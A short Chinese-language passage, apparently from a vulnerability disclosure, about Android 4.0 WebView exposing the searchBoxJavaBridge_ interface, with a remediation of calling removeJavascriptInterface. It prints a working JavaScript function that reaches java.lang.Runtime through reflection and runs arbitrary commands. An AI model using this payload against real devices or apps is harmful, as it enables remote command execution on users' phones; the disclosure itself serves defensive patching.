浏览器来说这种问题还是需要修补的
导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4.0手机上测试实际存在,4.2以上版本不存在
function execute(cmdArgs)
{
return searchBoxJavaBridge_.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}
测试页面:http://drops.wooyun.org/webview.html
参见: /Article/201309/241271.html
漏洞证明:
1.jpg
修复方案:
需要把这个接口删除,调用removeJavascriptInterface方法
/Article/201404/296370.html